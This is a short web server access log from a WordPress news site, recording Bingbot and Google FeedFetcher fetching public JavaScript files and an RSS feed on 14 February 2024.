40.77.167.0 - - [14/Feb/2024:23:51:34 +0100] "GET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1" 200 2010 cronicareinodearagon.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
40.77.167.0 - - [14/Feb/2024:23:51:35 +0100] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.2 HTTP/1.1" 200 7937 cronicareinodearagon.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
74.125.212.0 - - [14/Feb/2024:23:55:14 +0100] "GET /category/economia/feed/ HTTP/1.1" 200 42774 cronicareinodearagon.com "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)" "-"
